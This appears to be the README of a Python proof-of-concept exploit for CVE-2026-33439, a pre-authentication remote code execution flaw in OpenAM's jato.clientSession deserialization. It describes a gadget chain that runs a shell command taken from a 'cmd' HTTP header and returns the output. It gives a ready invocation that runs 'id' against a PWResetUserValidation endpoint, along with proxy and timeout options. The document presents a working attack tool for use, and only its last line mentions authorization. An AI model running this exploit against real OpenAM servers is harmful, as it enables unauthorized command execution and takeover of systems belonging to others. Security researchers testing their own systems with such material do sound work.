
Python PoC for CVE-2026-33439, an OpenAM pre-authentication RCE via jato.clientSession deserialization
Standalone Python proof of concept for the OpenAM pre-authentication remote code execution vulnerability in jato.clientSession deserialization.
The embedded shaded Click/Xalan gadget reads a shell command from the cmd HTTP header and returns its output in the HTTP response. No external Python packages, Java runtime, or JAR files are required.
python3 exploit.py \
--url https://target.example/openam/ui/PWResetUserValidation \
'id'
Optional arguments:
--timeout SECONDS Request timeout (default: 15)
--proxy URL HTTP proxy, for example http://127.0.0.1:8080
--verify-tls Enable TLS certificate verification
Use only against systems you own or are explicitly authorized to test.